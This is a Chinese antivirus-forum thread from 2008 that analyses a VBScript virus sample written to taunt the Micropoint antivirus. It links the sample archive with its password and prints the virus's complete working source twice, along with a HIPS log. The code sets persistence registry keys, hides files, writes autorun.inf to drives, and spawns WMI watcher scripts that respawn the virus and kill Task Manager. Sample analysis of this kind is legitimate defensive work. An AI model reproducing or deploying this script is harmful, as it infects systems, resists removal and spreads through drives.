收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 继续为微点量身订做的1.VBS浅析
123下一页
返回列表 发新帖
查看: 4628|回复: 21
收起左侧

[病毒样本] 继续为微点量身订做的1.VBS浅析

[复制链接]
白玉箫
发表于 2008-3-14 08:35:16 | 显示全部楼层 |阅读模式
先把病毒包传上来
^_^
测试环境:虚拟机
测试病毒包:1.RAR
网络环境:未连网

密码:123456

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1经验 +10 收起 理由
promised + 10 版区有你更精彩: )

查看全部评分

回复

举报

白玉箫
 楼主| 发表于 2008-3-14 08:37:21 | 显示全部楼层
解压后看到1.vbs
1.vbs代码内容:'
加入注册表项目
Set AA=CreateObject("Wscript.Shell")
AA.RegWrite "HKLM\SOFTWARE\Microsoft\Command Processor\AutoRun","c:\windows\cmd.bat","REG_SZ"
AA.RegWrite "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\load","c:\aa\BB.vbs","REG_SZ"
AA.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\KernelFaultCheck","c:\windows\cc.vbs","REG_SZ"
AA.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue","0","REG_DWORD"
AA.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\DefaultValue","0","REG_DWORD"
AA.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun","91","REG_DWORD"
set AA=nothing
on error resume next
Set fsofile = CreateObject("Scripting.FileSystemObject")
'病毒体备份
set self=fsofile.opentextfile(wscript.scriptfullname,1)'读取打开当前文件(本文件)
vbscopy=self.readall '读取病毒全部代码到字符串变量vbscopy
set tsobj=fsofile.opentextfile("c:\windows\vv.dll",2,true)'对病毒本体作备份
tsobj.write vbscopy  '将病毒代码覆盖目标文件
tsobj.close
vbscopy=left(vbscopy,13280)
set tsobj1=fsofile.opentextfile("c:\windows\uctools.dll",2,true)
tsobj1.write vbscopy
tsobj1.close
'创建目录aa临时目录
Set f = fsofile.CreateFolder("c:\aa")
fsofile.CopyFile "c:\windows\uctools.dll","c:\windows\cc.vbs"
fsofile.CopyFile "c:\windows\vv.dll","c:\aa\cc.vbs"'复制病毒到aa临时目录下
Set objFolder = fsofile.GetFolder("C:\aa")
If objFolder.Attributes = objFolder.Attributes AND 2 Then
    objFolder.Attributes = objFolder.Attributes XOR 2  
End If
'创建BB.VBS文件
set vbsfile=fsofile.CreateTextFile("c:\aa\bb.vbs", True)
vbsfile.WriteLine("Const HIDDEN_WINDOW = 12")
vbsfile.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
vbsfile.WriteLine("Set objWMIService = GetObject("&Chr(34)&"winmgmts:"&Chr(34)&" _")
vbsfile.WriteLine("& "&Chr(34)&"{impersonationLevel=impersonate}!\\"&Chr(34)&" & strComputer & "&Chr(34)&"\root\cimv2"&Chr(34)&")")
vbsfile.WriteLine("Set objStartup = objWMIService.Get("&Chr(34)&"Win32_ProcessStartup"&Chr(34)&")")
vbsfile.WriteLine("Set objConfig = objStartup.SpawnInstance_")
vbsfile.WriteLine("objConfig.ShowWindow = HIDDEN_WINDOW")
vbsfile.WriteLine("Set objProcess = GetObject("&Chr(34)&"winmgmts:root\cimv2:Win32_Process"&Chr(34)&")")
vbsfile.WriteLine("errReturn = objProcess.Create("&Chr(34)&"cmd /k subst z: c:\windows"&Chr(34)&", null, objConfig, intProcessID)")
vbsfile.WriteLine("errReturn = objProcess.Create("&Chr(34)&"cmd /k subst x: c:\windows"&Chr(34)&", null, objConfig, intProcessID)")
vbsfile.WriteLine("errReturn = objProcess.Create("&Chr(34)&"cmd /k subst m: c:\windows"&Chr(34)&", null, objConfig, intProcessID)")
vbsfile.WriteLine("errReturn = objProcess.Create("&Chr(34)&"cmd /k subst n: c:\windows"&Chr(34)&", null, objConfig, intProcessID)")
vbsfile.WriteLine("errReturn = objProcess.Create("&Chr(34)&"cmd /k subst y: c:\windows"&Chr(34)&", null, objConfig, intProcessID)")
vbsfile.WriteLine("Set shl = CreateObject("&Chr(34)&"Scripting.FileSystemObject"&Chr(34)&")")
vbsfile.WriteLine("shl.CopyFile "&Chr(34)&"c:\windows\uctools.dll"&Chr(34)&","&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
vbsfile.WriteLine("set shl = nothing")
vbsfile.WriteLine("set run1=createobject("&Chr(34)&"WScript.Shell"&Chr(34)&")")
vbsfile.WriteLine("run1.run"&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
vbsfile.WriteLine("run1.run"&Chr(34)&"c:\windows\backup.vbs"&Chr(34))
vbsfile.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon3.vbs"&Chr(34))
vbsfile.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon4.vbs"&Chr(34))
vbsfile.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon2.vbs"&Chr(34))
vbsfile.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon1.vbs"&Chr(34))
vbsfile.WriteLine("set run1=nothing")
vbsfile.WriteLine("Wscript.Echo("&Chr(34)&"微点您什么时候,才会对我下手"&Chr(34)&")")
vbsfile.Close
fsofile.CopyFile"c:\aa\bb.vbs","c:\windows\bb.dll"
'创建cmd.bat文件
set windowscmd=fsofile.CreateTextFile("c:\windows\cmd.bat", True)
windowscmd.WriteLine("@echo off")
windowscmd.WriteLine("echo [AUTORUN] >c:\autorun.inf")
windowscmd.WriteLine("echo OPEN=c:\windows\system32\cscript.exe c:\aa\cc.vbs >>c:\autorun.inf")
windowscmd.WriteLine("echo ICON=explorer.exe >>c:\autorun.inf")
windowscmd.WriteLine("echo [AUTORUN] >d:\autorun.inf")
windowscmd.WriteLine("echo OPEN=c:\windows\system32\cscript.exe c:\aa\cc.vbs >>d:\autorun.inf")
windowscmd.WriteLine("echo ICON=explorer.exe >>d:\autorun.inf")
windowscmd.WriteLine("attrib c:\autorun.inf +h +s +r")
windowscmd.WriteLine("attrib d:\autorun.inf +h +s +r")
windowscmd.WriteLine("cls")
windowscmd.WriteLine("copy c:\widnows\uctools.dll c:\windows\cc.vbs /y")
windowscmd.WriteLine("copy c:\windows\system32\backup.dll c:\windows\backup.vbs /y" )
windowscmd.WriteLine("cls")
windowscmd.WriteLine("echo set run1=createobject("&Chr(34)&"WScript.Shell"&Chr(34)&") >c:\windows\aa.vbs")
windowscmd.WriteLine("echo run1.run"&Chr(34)&"c:\windows\cc.vbs"&Chr(34)&" >>c:\windows\aa.vbs")
windowscmd.WriteLine("echo run1.run"&Chr(34)&"c:\windows\backup.vbs"&Chr(34)&" >>c:\windows\aa.vbs")
windowscmd.WriteLine("echo set run1=nothing>>c:\windows\aa.vbs")
windowscmd.WriteLine("cscript c:\windows\aa.vbs")
windowscmd.WriteLine("cls")
windowscmd.WriteLine("echo Microsoft Windows XP [版本 5.1.2600]")
windowscmd.WriteLine("echo (C) 版权所有 1985-2001 Microsoft Corp.")
windowscmd.WriteLine("echo.")
windowscmd.Close
'创建backup.dll文件监视aa目录变动
set dllfile=fsofile.CreateTextFile("c:\windows\system32\backup.dll", True)
dllfile.WriteLine("on error resume next")
dllfile.WriteLine("Set fsofile = CreateObject("&Chr(34)&"Scripting.FileSystemObject"&Chr(34)&")")
dllfile.WriteLine("Set f = fsofile.CreateFolder("&Chr(34)&"c:\aa"&Chr(34)&")")
dllfile.WriteLine("fsofile.CopyFile "&Chr(34)&"c:\windows\bb.dll"&Chr(34)&","&Chr(34)&"c:\aa\bb.vbs"&Chr(34))
dllfile.WriteLine("set fsofile=nothing")
dllfile.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
dllfile.WriteLine("Set objWMIService = GetObject("&Chr(34)&"winmgmts:"&Chr(34)&" _")
dllfile.WriteLine("& "&Chr(34)&"{impersonationLevel=impersonate}!\\"&Chr(34)&" & _")
dllfile.WriteLine("strComputer & "&Chr(34)&"\root\cimv2"&Chr(34)&")")
dllfile.WriteLine("Set colMonitoredEvents = objWMIService.ExecNotificationQuery _")
dllfile.WriteLine("("&Chr(34)&"SELECT * FROM __InstanceDeletionEvent WITHIN 10 WHERE "&Chr(34)&" _")
dllfile.WriteLine("& "&Chr(34)&"Targetinstance ISA 'CIM_DirectoryContainsFile' and "&Chr(34)&" _")
dllfile.WriteLine("& "&Chr(34)&"TargetInstance.GroupComp _")
dllfile.WriteLine("& "&Chr(34)&"'Win32_Directory.Name="&Chr(34)&Chr(34)&"c:\\\\aa"&Chr(34)&Chr(34)&"'"&Chr(34)&")")
dllfile.WriteLine("Do")
dllfile.WriteLine("Set objLatestEvent = colMonitoredEvents.NextEvent")
dllfile.WriteLine("WScript.Sleep 10000")
dllfile.WriteLine("Set fsofile = CreateObject("&Chr(34)&"Scripting.FileSystemObject"&Chr(34)&")")
dllfile.WriteLine("Set f = fsofile.CreateFolder("&Chr(34)&"c:\aa"&Chr(34)&")")
dllfile.WriteLine("fsofile.CopyFile "&Chr(34)&"c:\windows\bb.dll"&Chr(34)&","&Chr(34)&"c:\aa\bb.vbs"&Chr(34))
dllfile.WriteLine("set fsofile=nothing")
dllfile.WriteLine("Loop")
dllfile.Close:
fsofile.CopyFile "c:\windows\system32\backup.dll","c:\windows\backup.vbs"
'创建进进程监视程文件mon1.vbs
set mon1=fsofile.CreateTextFile("c:\windows\system32\mon1.vbs", True)
mon1.WriteLine("on error resume next")
mon1.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
mon1.WriteLine("Set objWMIService = GetObject("&Chr(34)&"winmgmts:"&Chr(34)&" _")
mon1.WriteLine(" & "&Chr(34)&"{impersonationLevel=impersonate}!\\"&Chr(34)&" & strComputer & "&Chr(34)&"\root\cimv2"&Chr(34)&")")
mon1.WriteLine("Set colMonitoredProcesses = objWMIService. _")
mon1.WriteLine("ExecNotificationQuery("&Chr(34)&"select * from __instancedeletionevent "&Chr(34)&" _ ")
mon1.WriteLine("& "&Chr(34)&"within 1 where TargetInstance isa 'Win32_Process'"&Chr(34)&")")
mon1.WriteLine("i = 0")
mon1.WriteLine("Do While i = 0")
mon1.WriteLine("Set objLatestProcess = colMonitoredProcesses.NextEvent")
mon1.WriteLine("Set shl = CreateObject("&Chr(34)&"Scripting.FileSystemObject"&Chr(34)&")")
mon1.WriteLine("shl.CopyFile "&Chr(34)&"c:\windows\uctools.dll"&Chr(34)&","&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
mon1.WriteLine("set shl = nothing")
mon1.WriteLine("set run1=createobject("&Chr(34)&"WScript.Shell"&Chr(34)&")")
mon1.WriteLine("'run1.run"&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
mon1.WriteLine("run1.run"&Chr(34)&"c:\windows\backup.vbs"&Chr(34))
mon1.WriteLine("'run1.run"&Chr(34)&"c:\windows\system32\mon1.vbs"&Chr(34))
mon1.WriteLine("'run1.run"&Chr(34)&"c:\windows\system32\mon2.vbs"&Chr(34))
mon1.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon3.vbs"&Chr(34))
mon1.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon4.vbs"&Chr(34))
mon1.WriteLine("set run1=nothing")
mon1.WriteLine("Wscript.Echo("&Chr(34)&"可爱的微点,我将让您头痛的很"&Chr(34)&")")
mon1.WriteLine("Loop")
mon1.close
'创建进进程监视程文件mon2.vbs
set mon2=fsofile.CreateTextFile("c:\windows\system32\mon2.vbs", True)
mon2.WriteLine("on error resume next")
mon2.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
mon2.WriteLine("Set objWMIService = GetObject("&Chr(34)&"winmgmts:"&Chr(34)&" _")
mon2.WriteLine(" & "&Chr(34)&"{impersonationLevel=impersonate}!\\"&Chr(34)&" & strComputer & "&Chr(34)&"\root\cimv2"&Chr(34)&")")
mon2.WriteLine("Set colMonitoredProcesses = objWMIService. _")
mon2.WriteLine("ExecNotificationQuery("&Chr(34)&"select * from __instancedeletionevent "&Chr(34)&" _ ")
mon2.WriteLine("& "&Chr(34)&"within 1 where TargetInstance isa 'Win32_Process'"&Chr(34)&")")
mon2.WriteLine("i = 0:Do While i = 0:Set objLatestProcess = colMonitoredProcesses.NextEvent")
mon2.WriteLine("Set shl = CreateObject("&Chr(34)&"Scripting.FileSystemObject"&Chr(34)&")")
mon2.WriteLine("shl.CopyFile "&Chr(34)&"c:\windows\uctools.dll"&Chr(34)&","&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
mon2.WriteLine("set shl = nothing")
mon2.WriteLine("set run1=createobject("&Chr(34)&"WScript.Shell"&Chr(34)&")")
mon2.WriteLine("run1.run"&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
mon2.WriteLine("run1.run"&Chr(34)&"c:\windows\backup.vbs"&Chr(34))
mon2.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon1.vbs"&Chr(34))
mon2.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon2.vbs"&Chr(34))
mon2.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon3.vbs"&Chr(34))
mon2.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon4.vbs"&Chr(34))
mon2.WriteLine("set run1=nothing")
mon2.WriteLine("Loop")
mon2.close
'创建任务管理器监视程序mon3.vbs
set mon3=fsofile.CreateTextFile("c:\windows\system32\mon3.vbs", True)
mon3.WriteLine("on error resume next")
mon3.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
mon3.WriteLine("Set objWMIService = GetObject("&Chr(34)&"winmgmts:"&Chr(34)&" _")
mon3.WriteLine("& "&Chr(34)&"{impersonationLevel=impersonate}!\\"&Chr(34)&" & strComputer & "&Chr(34)&"\root\cimv2"&Chr(34)&")")
mon3.WriteLine("Set colMonitoredProcesses = objWMIService. _")
mon3.WriteLine("ExecNotificationQuery("&Chr(34)&"select * from __instancecreationevent "&Chr(34)&" _")
mon3.WriteLine("& " &Chr(34)&"within 1 where TargetInstance isa 'Win32_Process'"&Chr(34)&")")
mon3.WriteLine("i=0:Do While i = 0:Set objLatestProcess = colMonitoredProcesses.NextEvent")
mon3.WriteLine("If objLatestProcess.TargetInstance.Name = "&Chr(34)&"taskmgr.exe"&Chr(34)&" or objLatestProcess.TargetInstance.Name = "&Chr(34)&"TASKMGR.EXE"&Chr(34)&"  Then")
mon3.WriteLine("objLatestProcess.TargetInstance.Terminate")
mon3.WriteLine("End If:Loop")
mon3.close
'创建windows目录监视程序mon4.vbs
set mon4=fsofile.CreateTextFile("c:\windows\system32\mon4.vbs", True)
mon4.WriteLine("on error resume next")
mon4.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
mon4.WriteLine("on error resume next")
mon4.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
mon4.WriteLine("Set objWMIService = GetObject("&Chr(34)&"winmgmts:"&Chr(34)&" _")
mon4.WriteLine("& "&Chr(34)&"{impersonationLevel=impersonate}!\\"&Chr(34)&" & _")
mon4.WriteLine("strComputer & "&Chr(34)&"\root\cimv2"&Chr(34)&")")
mon4.WriteLine("Set colMonitoredEvents = objWMIService.ExecNotificationQuery _")
mon4.WriteLine("("&Chr(34)&"SELECT * FROM __InstanceDeletionEvent WITHIN 10 WHERE "&Chr(34)&" _")
mon4.WriteLine("& "&Chr(34)&"Targetinstance ISA 'CIM_DirectoryContainsFile' and "&Chr(34)&" _")
mon4.WriteLine("& "&Chr(34)&"TargetInstance.GroupComp _")
mon4.WriteLine("& "&Chr(34)&"'Win32_Directory.Name="&Chr(34)&Chr(34)&"c:\\\\windows"&Chr(34)&Chr(34)&"'"&Chr(34)&")")
mon4.WriteLine("Do")
mon4.WriteLine("Set objLatestEvent = colMonitoredEvents.NextEvent")
mon4.WriteLine("WScript.Sleep 10000")
mon4.WriteLine("Set fsofile = CreateObject("&Chr(34)&"Scripting.FileSystemObject"&Chr(34)&")")
mon4.WriteLine("fsofile.CopyFile "&Chr(34)&"c:\windows\uctools.dll"&Chr(34)&","&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
mon4.WriteLine("set fsofile=nothing")
mon4.WriteLine("set run1=createobject("&Chr(34)&"WScript.Shell"&Chr(34)&")")
mon4.WriteLine("run1.run"&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
mon4.WriteLine("set run1=nothing:Loop")
mon4.close
set fsofile=nothing
'运行5个监视程序'''''''''''''
'''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''''''''''
set run1=createobject("WScript.Shell")  
run1.run"c:\windows\backup.vbs"  
run1.run"c:\windows\system32\mon1.vbs"
'run1.run"c:\windows\system32\mon2.vbs"
'run1.run"c:\windows\system32\mon3.vbs"
run1.run"c:\windows\system32\mon4.vbs"
set run1=nothing
Wscript.Echo("可爱的微点您一直对我无动于衷,这将使您的用户电脑系统死于我的手上,这同样也将成为您的坟墓,希望你为了自己的生存能够尽快解决")
Wscript.Echo("希望您(微点)能尽快解决,俺主人对国产杀毒是很看重的,特别是您(东方微点)跟费尔托斯是俺主人最为看重的两款杀毒软件,请您(微点)别让俺主人失望;俺主人其实并不是存心刁难您的,只是想让您(微点)的主人能够重视俺这类脚本病毒;在逛网页时像俺这样的脚本是很容易中的,相信您(微点)的主人比俺的主人跟清楚;俺的主人一直会期待着您能够拦截俺这类病毒.....")
Wscript.Echo("期待着黎明的阳光,期待微点的上市.........")
回复

举报

白玉箫
 楼主| 发表于 2008-3-14 08:39:07 | 显示全部楼层
双击后直接提示:
可爱的微点您一直对我无动于衷,这将使您的用户电脑系统死于我的手上,这同样也将成为您的坟墓,希望你为了自己的生存能够尽快解决

然后点了确定又一提示:
希望您(微点)能尽快解决,俺主人对国产杀毒是很看重的,特别是您(东方微点)跟费尔托斯是俺主人最为看重的两款杀毒软件,请您(微点)别让俺主人失望;俺主人其实并不是存心刁难您的,只是想让您(微点)的主人能够重视俺这类脚本病毒;在逛网页时像俺这样的脚本是很容易中的,相信您(微点)的主人比俺的主人跟清楚;俺的主人一直会期待着您能够拦截俺这类病毒.....

点确定 继续提示
期待着黎明的阳光,期待微点的上市.........


继续点确定 继续提示
可爱的微点,我将让您头痛的很

再继续点确定
终于没提示了
现在看日志,
2008-03-13 20:31:03    应用程序保护(结束/挂起进程)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\wbem\wmiprvse.exe  
目标进程:C:\WINDOWS\system32\taskmgr.exe  //把进程给挂起了 比第1个做的好,但是如果在执行vbs前开启了任务管理器的话,可以结束掉WScript.exe,大约有5--6个,但是C:\WINDOWS\system32\wbem\wmiprvse.exe是结束不掉的
2008-03-13 20:30:38    应用程序保护(运行应用程序)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\Explorer.EXE
文件路径:C:\WINDOWS\system32\taskmgr.exe  //这个是想查看进程的操作
2008-03-13 20:23:19    应用程序保护(运行应用程序)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\system32\svchost.exe
文件路径:C:\WINDOWS\system32\wbem\wmiprvse.exe
命令行:-Embedding   
2008-03-13 20:22:47    应用程序保护(运行应用程序)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\System32\WScript.exe
文件路径:C:\WINDOWS\System32\WScript.exe
命令行:"c:\windows\backup.vbs"   
2008-03-13 20:22:40    文件保护(创建文件)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\System32\WScript.exe
文件路径:C:\windows\system32\backup.dll
2008-03-13 20:22:39    文件保护(创建文件)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\System32\WScript.exe
文件路径:C:\windows\bb.dll
2008-03-13 20:22:36    文件保护(创建文件)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\System32\WScript.exe
文件路径:C:\windows\uctools.dll         
2008-03-13 20:22:35    文件保护(创建文件)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\System32\WScript.exe
文件路径:C:\windows\vv.dll        //SYSTEM32写入文件
2008-03-13 20:22:32    注册表保护(修改注册表内容)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\System32\WScript.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
注册表名称:KernelFaultCheck
更改后:c:\windows\cc.vbs
更改前:c:\windows\cc.vbs                              //继续在WINDOWS下加载
2008-03-13 20:22:31    注册表保护(修改注册表内容)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\System32\WScript.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
注册表名称:load
更改后:c:\aa\BB.vbs
更改前:c:\aa\BB.vbs                        //注册表加载
2008-03-13 20:22:21    应用程序保护(运行应用程序)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\Explorer.EXE
文件路径:C:\WINDOWS\System32\WScript.exe          //继续走这个路线 还是这个进程
命令行:"C:\Documents and Settings\Administrator\桌面\1.vbs"  
2008-03-13 20:19:25    应用程序保护(运行应用程序)    操作:允许(自动创建规则)
进程路径:C:\WINDOWS\Explorer.EXE
文件路径:C:\Program Files\WinRAR\WinRAR.exe
命令行:x -iext -ow -ver -- "C:\Documents and Settings\Administrator\桌面\1.rar" "C:\Documents and Settings\Administrator\桌面\"      
2008-03-13 20:15:18    文件保护已经开启.

2008-03-13 20:15:18    注册表保护已经开启.

2008-03-13 20:15:18    应用程序保护已经开启.


进C盘 依旧看到熟悉的AA文件夹,接着进去,看到了依旧熟悉的bb.vbs 和cc.vbs
Bb.vbs代码:
Const HIDDEN_WINDOW = 12
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create("cmd /k subst z: c:\windows", null, objConfig, intProcessID)
errReturn = objProcess.Create("cmd /k subst x: c:\windows", null, objConfig, intProcessID)
errReturn = objProcess.Create("cmd /k subst m: c:\windows", null, objConfig, intProcessID)
errReturn = objProcess.Create("cmd /k subst n: c:\windows", null, objConfig, intProcessID)
errReturn = objProcess.Create("cmd /k subst y: c:\windows", null, objConfig, intProcessID)
Set shl = CreateObject("Scripting.FileSystemObject")
shl.CopyFile "c:\windows\uctools.dll","c:\windows\cc.vbs"
set shl = nothing
set run1=createobject("WScript.Shell")
run1.run"c:\windows\cc.vbs"
run1.run"c:\windows\backup.vbs"
run1.run"c:\windows\system32\mon3.vbs"
run1.run"c:\windows\system32\mon4.vbs"
run1.run"c:\windows\system32\mon2.vbs"
run1.run"c:\windows\system32\mon1.vbs"
set run1=nothing
Wscript.Echo("微点您什么时候,才会对我下手")
会跳出来一个提示
“可爱的微点,我将让您头痛的很”------调用的是cc.vbs的内容
回复

举报

白玉箫
 楼主| 发表于 2008-3-14 08:40:06 | 显示全部楼层
Cc.vbs代码内容如下:
'加入注册表项目
Set AA=CreateObject("Wscript.Shell")
AA.RegWrite "HKLM\SOFTWARE\Microsoft\Command Processor\AutoRun","c:\windows\cmd.bat","REG_SZ"
AA.RegWrite "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\load","c:\aa\BB.vbs","REG_SZ"
AA.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\KernelFaultCheck","c:\windows\cc.vbs","REG_SZ"
AA.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue","0","REG_DWORD"
AA.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\DefaultValue","0","REG_DWORD"
AA.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun","91","REG_DWORD"
set AA=nothing
on error resume next
Set fsofile = CreateObject("Scripting.FileSystemObject")
'病毒体备份
set self=fsofile.opentextfile(wscript.scriptfullname,1)'读取打开当前文件(本文件)
vbscopy=self.readall '读取病毒全部代码到字符串变量vbscopy
set tsobj=fsofile.opentextfile("c:\windows\vv.dll",2,true)'对病毒本体作备份
tsobj.write vbscopy  '将病毒代码覆盖目标文件
tsobj.close
vbscopy=left(vbscopy,13280)
set tsobj1=fsofile.opentextfile("c:\windows\uctools.dll",2,true)
tsobj1.write vbscopy
tsobj1.close
'创建目录aa临时目录
Set f = fsofile.CreateFolder("c:\aa")
fsofile.CopyFile "c:\windows\uctools.dll","c:\windows\cc.vbs"
fsofile.CopyFile "c:\windows\vv.dll","c:\aa\cc.vbs"'复制病毒到aa临时目录下
Set objFolder = fsofile.GetFolder("C:\aa")
If objFolder.Attributes = objFolder.Attributes AND 2 Then
    objFolder.Attributes = objFolder.Attributes XOR 2  
End If
'创建BB.VBS文件
set vbsfile=fsofile.CreateTextFile("c:\aa\bb.vbs", True)
vbsfile.WriteLine("Const HIDDEN_WINDOW = 12")
vbsfile.WriteLine("strComputer = "&Chr(34)&"."&Chr(34))
vbsfile.WriteLine("Set objWMIService = GetObject("&Chr(34)&"winmgmts:"&Chr(34)&" _")
vbsfile.WriteLine("& "&Chr(34)&"{impersonationLevel=impersonate}!\\"&Chr(34)&" & strComputer & "&Chr(34)&"\root\cimv2"&Chr(34)&")")
vbsfile.WriteLine("Set objStartup = objWMIService.Get("&Chr(34)&"Win32_ProcessStartup"&Chr(34)&")")
vbsfile.WriteLine("Set objConfig = objStartup.SpawnInstance_")
vbsfile.WriteLine("objConfig.ShowWindow = HIDDEN_WINDOW")
vbsfile.WriteLine("Set objProcess = GetObject("&Chr(34)&"winmgmts:root\cimv2:Win32_Process"&Chr(34)&")")
vbsfile.WriteLine("errReturn = objProcess.Create("&Chr(34)&"cmd /k subst z: c:\windows"&Chr(34)&", null, objConfig, intProcessID)")
vbsfile.WriteLine("errReturn = objProcess.Create("&Chr(34)&"cmd /k subst x: c:\windows"&Chr(34)&", null, objConfig, intProcessID)")
vbsfile.WriteLine("errReturn = objProcess.Create("&Chr(34)&"cmd /k subst m: c:\windows"&Chr(34)&", null, objConfig, intProcessID)")
vbsfile.WriteLine("errReturn = objProcess.Create("&Chr(34)&"cmd /k subst n: c:\windows"&Chr(34)&", null, objConfig, intProcessID)")
vbsfile.WriteLine("errReturn = objProcess.Create("&Chr(34)&"cmd /k subst y: c:\windows"&Chr(34)&", null, objConfig, intProcessID)")
vbsfile.WriteLine("Set shl = CreateObject("&Chr(34)&"Scripting.FileSystemObject"&Chr(34)&")")
vbsfile.WriteLine("shl.CopyFile "&Chr(34)&"c:\windows\uctools.dll"&Chr(34)&","&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
vbsfile.WriteLine("set shl = nothing")
vbsfile.WriteLine("set run1=createobject("&Chr(34)&"WScript.Shell"&Chr(34)&")")
vbsfile.WriteLine("run1.run"&Chr(34)&"c:\windows\cc.vbs"&Chr(34))
vbsfile.WriteLine("run1.run"&Chr(34)&"c:\windows\backup.vbs"&Chr(34))
vbsfile.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon3.vbs"&Chr(34))
vbsfile.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon4.vbs"&Chr(34))
vbsfile.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon2.vbs"&Chr(34))
vbsfile.WriteLine("run1.run"&Chr(34)&"c:\windows\system32\mon1.vbs"&Chr(34))
vbsfile.WriteLine("set run1=nothing")
vbsfile.WriteLine("Wscript.Echo("&Chr(34)&"微点您什么时候,才会对我下手"&Chr(34)&")")
vbsfile.Close
fsofile.CopyFile"c:\aa\bb.vbs","c:\windows\bb.dll"
'创建cmd.bat文件
set windowscmd=fsofile.CreateTextFile("c:\windows\cmd.bat", True)
windowscmd.WriteLine("@echo off")
windowscmd.WriteLine("echo [AUTORUN] >c:\autorun.inf")
windowscmd.WriteLine("echo OPEN=c:\windows\system32\cscript.exe c:\aa\cc.vbs >>c:\autorun.inf")
windowscmd.WriteLine("echo ICON=explorer.exe >>c:\autorun.inf")
windowscmd.WriteLine("echo [AUTORUN] >d:\autorun.inf")
windowscmd.WriteLine("echo OPEN=c:\windows\system32\cscript.exe c:\aa\cc.vbs >>d:\autorun.inf")
windowscmd.WriteLine("echo ICON=explorer.exe >>d:\autorun.inf")
windowscmd.WriteLine("attrib c:\autorun.inf +h +s +r")
windowscmd.WriteLine("attrib d:\autorun.inf +h +s +r")
windowscmd.WriteLine("cls")
windowscmd.WriteLine("copy c:\widnows\uctools.dll c:\windows\cc.vbs /y")
windowscmd.WriteLine("copy c:\windows\system32\backup.dll c:\windows\backup.vbs /y" )
windowscmd.WriteLine("cls")
windowscmd.WriteLine("echo set run1=createobject("&Chr(34)&"WScript.Shell"&Chr(34)&") >c:\windows\aa.vbs")
windowscmd.WriteLine("echo run1.run"&Chr(34)&"c:\windows\cc.vbs"&Chr(34)&" >>c:\windows\aa.vbs")
windowscmd.WriteLine("echo run1.run"&Chr(34)&"c:\windows\backup.vbs"&Chr(34)&" >>c:\windows\aa.vbs")
windowscmd.WriteLine("echo set run1=nothing>>c:\windows\aa.vbs")
windowscmd.WriteLine("cscript c:\windows\aa.vbs")
windowscmd.WriteLine("cls")
windowscmd.WriteLine("echo Microsoft Windows XP [版本 5.1.2600]")
